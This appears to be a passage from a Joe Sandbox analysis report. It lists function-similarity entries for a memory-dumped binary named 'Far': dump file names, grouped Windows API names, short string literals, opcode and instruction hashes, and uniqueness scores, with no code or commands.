                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2598888154-3916222277
                                                                                                                                                                      • Opcode ID: b8d040fc371400c17cd5bc8c7163438f0cbb93eca908ae7607e2eac7ccb92523
                                                                                                                                                                      • Instruction ID: 7d089fcaa497e4029421b125acf748e132f0051cbccb1bd79f66abce9332f639
                                                                                                                                                                      • Opcode Fuzzy Hash: b8d040fc371400c17cd5bc8c7163438f0cbb93eca908ae7607e2eac7ccb92523
                                                                                                                                                                      • Instruction Fuzzy Hash: D6519837B09A44CBE750EFA5E440AAEB7B5F748B88F808136EE4953B18DF38D4158B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                      • API String ID: 2706829360-2785691316
                                                                                                                                                                      • Opcode ID: e68dfdb4ab84dc8ad304d5d5bce64bf713bc48614246731dd5a92f425076369b
                                                                                                                                                                      • Instruction ID: d8b26f839084fcd3a236fbb4d625a525f086f1e7fe86dd38bd53453e84337a00
                                                                                                                                                                      • Opcode Fuzzy Hash: e68dfdb4ab84dc8ad304d5d5bce64bf713bc48614246731dd5a92f425076369b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C515332B29A569AEB00EFA1D8946FC6770FB84F88F805535DE0E47655EF38D449D320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 4125642244-438819550
                                                                                                                                                                      • Opcode ID: 61bd58f4eafb961aacc7a0631a5a312094d71a9a643225a92a9d3270af838a83
                                                                                                                                                                      • Instruction ID: e24c62cd41d51b0ac7af2b226e56b36a5f52ff975e565e487a6ab784cb67b101
                                                                                                                                                                      • Opcode Fuzzy Hash: 61bd58f4eafb961aacc7a0631a5a312094d71a9a643225a92a9d3270af838a83
                                                                                                                                                                      • Instruction Fuzzy Hash: 0681A26261CA8AA2EB10EF95E8406BDA360FB44F45FC00036DA8E4B795EF7CD545D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1974058525-0
                                                                                                                                                                      • Opcode ID: 69bc9f51e457715ae59f4123bd16653ccb2b9a1c7d1c421fcda1c13e3138082f
                                                                                                                                                                      • Instruction ID: 1ce57139adeb44e0dc4faa61a1533e292c898c6d8773320adaccb1d06d59b161
                                                                                                                                                                      • Opcode Fuzzy Hash: 69bc9f51e457715ae59f4123bd16653ccb2b9a1c7d1c421fcda1c13e3138082f
                                                                                                                                                                      • Instruction Fuzzy Hash: A1919E61A0E60BA1EB54AFA1E4906B8A365FF85F84FD44032CD0E47754EF7CE491A330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                      • Opcode ID: 6341a5ffdee5fe6a8a4c3ddb1dfac698444aa59f5f702eedab95ea46bdb7f588
                                                                                                                                                                      • Instruction ID: 30298ac024ad99650d580be0b75ed6180756ddd143799e6dae5df7e9856892f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 6341a5ffdee5fe6a8a4c3ddb1dfac698444aa59f5f702eedab95ea46bdb7f588
                                                                                                                                                                      • Instruction Fuzzy Hash: 70619272F086409BE714DFA5E4446ACB7A6F788B84F608139DE0993F58EF38D9058B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharDriveLowerTypewcscpy
                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                      • API String ID: 1561581874-1000479233
                                                                                                                                                                      • Opcode ID: d2fb285c13596bd01e6ca34714d13bb4f14b155ce798f64b6bbf338610cc6c62
                                                                                                                                                                      • Instruction ID: 474a847e2303e1d5f0107a1537da9bc1337de590b453704116991100648b7cd1
                                                                                                                                                                      • Opcode Fuzzy Hash: d2fb285c13596bd01e6ca34714d13bb4f14b155ce798f64b6bbf338610cc6c62
                                                                                                                                                                      • Instruction Fuzzy Hash: F1D11326B0C65E61EA20ABD5D4841B9E3A0FB54FA4FC00231DADD5B7D4FF2CE945A720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                      • String ID: P
                                                                                                                                                                      • API String ID: 1268354404-3110715001
                                                                                                                                                                      • Opcode ID: 0ea2176aeb22f7d7cbe06e39ec02f6ce2839a5622b48d8f95bdf6d02a57b5f4d
                                                                                                                                                                      • Instruction ID: c44b5920bc0946777ede55e58743327bc1167695ae7b7927a509c5ddaae8131b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ea2176aeb22f7d7cbe06e39ec02f6ce2839a5622b48d8f95bdf6d02a57b5f4d
                                                                                                                                                                      • Instruction Fuzzy Hash: B961A436A0C64AA6EF14EFA5D840679A752FF84F98F940536DE0D43754EF3CE440A720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 3821898125-2160076837
                                                                                                                                                                      • Opcode ID: 611fca2a1040de3c8ea3754848b261f525e769e147e96a1ef2273d583ffda5db
                                                                                                                                                                      • Instruction ID: f6e4e727bf7a85f0c4c09541e7fd79afb32cb9fadc149541dd3bb8b7fdd71081
                                                                                                                                                                      • Opcode Fuzzy Hash: 611fca2a1040de3c8ea3754848b261f525e769e147e96a1ef2273d583ffda5db
                                                                                                                                                                      • Instruction Fuzzy Hash: F341BE3260CB8586E7609F65E484B9EB3A1FB88B90F904235EA9C43B98DF3DD444DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                                      • Opcode ID: c70e8cdf5966cfd68d0ada46d1cdcb06f5bff22b1f1c5e1ff9aad9cb0b65ce18
                                                                                                                                                                      • Instruction ID: dcc0964c484996e90002bcec8be6f41f6b9a7828ac9b1e0660691d22453e2bee
                                                                                                                                                                      • Opcode Fuzzy Hash: c70e8cdf5966cfd68d0ada46d1cdcb06f5bff22b1f1c5e1ff9aad9cb0b65ce18
                                                                                                                                                                      • Instruction Fuzzy Hash: D7716023A0CA4AA5EB14AFA6D4502BDA760FF84F98F944032DE4E47765EF38D445E360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                                                                                      • Opcode ID: dbd595227be3ecf1cf9d611c3ab4529180a90320c6a12aa141b14af23a7c3b95
                                                                                                                                                                      • Instruction ID: 442390ce1bc7faa62d41adc1cab5567554fe0dae446faf071aabaa948ac7cca9
                                                                                                                                                                      • Opcode Fuzzy Hash: dbd595227be3ecf1cf9d611c3ab4529180a90320c6a12aa141b14af23a7c3b95
                                                                                                                                                                      • Instruction Fuzzy Hash: FD419D32A0EB49E9EB00DBA4E8817E977A8EB04B98F904135EE5C47B54EF3CD025D354
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                      • API String ID: 2479661705-3771769585
                                                                                                                                                                      • Opcode ID: eb198abc5cd8633a4d5b5ffaa66c4893f251783bd88e3ef7b8c34d98760a194a
                                                                                                                                                                      • Instruction ID: 9deaed13205ec2afb1cef64dd6e7cab65e23d611762bd147ce24f41f0c2a133b
                                                                                                                                                                      • Opcode Fuzzy Hash: eb198abc5cd8633a4d5b5ffaa66c4893f251783bd88e3ef7b8c34d98760a194a
                                                                                                                                                                      • Instruction Fuzzy Hash: FC217F21B0D94AA1EE24BB91E4843BDE321EF84F80FC44135D59E466E5FF6CD545D320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2672075419-0
                                                                                                                                                                      • Opcode ID: 191be6af68c6d9ab195f6e7c6856fe9a31fcdbc310c743d3ad28e1ea2694916b
                                                                                                                                                                      • Instruction ID: c49b85fde29de6e14bfe61c273aa396e01cea0f71aa26c2dac3acef63905cc40
                                                                                                                                                                      • Opcode Fuzzy Hash: 191be6af68c6d9ab195f6e7c6856fe9a31fcdbc310c743d3ad28e1ea2694916b
                                                                                                                                                                      • Instruction Fuzzy Hash: FE918236B0E61AA6E750AFB1D4843EDA3A5FB94F48FA00035DE0D47685EF38E5499720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                      • Opcode ID: 318b63d8b26fcc84aa937f5e529a0c6342ee06c071bd7193752e4e6464ec8a93
                                                                                                                                                                      • Instruction ID: b76c08654b22c0ac4d809a35fe361ab1a95903eca42b370852d0ffc78cf3544a
                                                                                                                                                                      • Opcode Fuzzy Hash: 318b63d8b26fcc84aa937f5e529a0c6342ee06c071bd7193752e4e6464ec8a93
                                                                                                                                                                      • Instruction Fuzzy Hash: B3316225B1C60B67E750AFE5E48067DA6A2BB54B80FD14034CC8943654FFBEE845B660
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 685491774-0
                                                                                                                                                                      • Opcode ID: d5c4d2dcdc5be66450fd37b7a0dc9ed18aa910b8b94ddfa32769d8406b08eb10
                                                                                                                                                                      • Instruction ID: 44a55ce32ec6150d07885b87a5136d44e655b00130a53a8fb52c9bd98e706736
                                                                                                                                                                      • Opcode Fuzzy Hash: d5c4d2dcdc5be66450fd37b7a0dc9ed18aa910b8b94ddfa32769d8406b08eb10
                                                                                                                                                                      • Instruction Fuzzy Hash: CF119035F0DA0692F714ABA2E8945AD6361AFCCF80FD09838C94E83750EF3ED0549361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                                                                      • String ID: -----$SysListView32
                                                                                                                                                                      • API String ID: 2361508679-3975388722
                                                                                                                                                                      • Opcode ID: bc564e941b47d79e87985cb8181bb6f7181df5ecdb6776c17cf3e0402f794042
                                                                                                                                                                      • Instruction ID: be40684727763d93ca056d0417300d8c388d5b01c7f1202b7d61b28a891a40d0
                                                                                                                                                                      • Opcode Fuzzy Hash: bc564e941b47d79e87985cb8181bb6f7181df5ecdb6776c17cf3e0402f794042
                                                                                                                                                                      • Instruction Fuzzy Hash: F151D332A087959AE720DFA4E8846DD73A5FB88B84F80013ADE4C07B55DF38D555D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3210457359-0
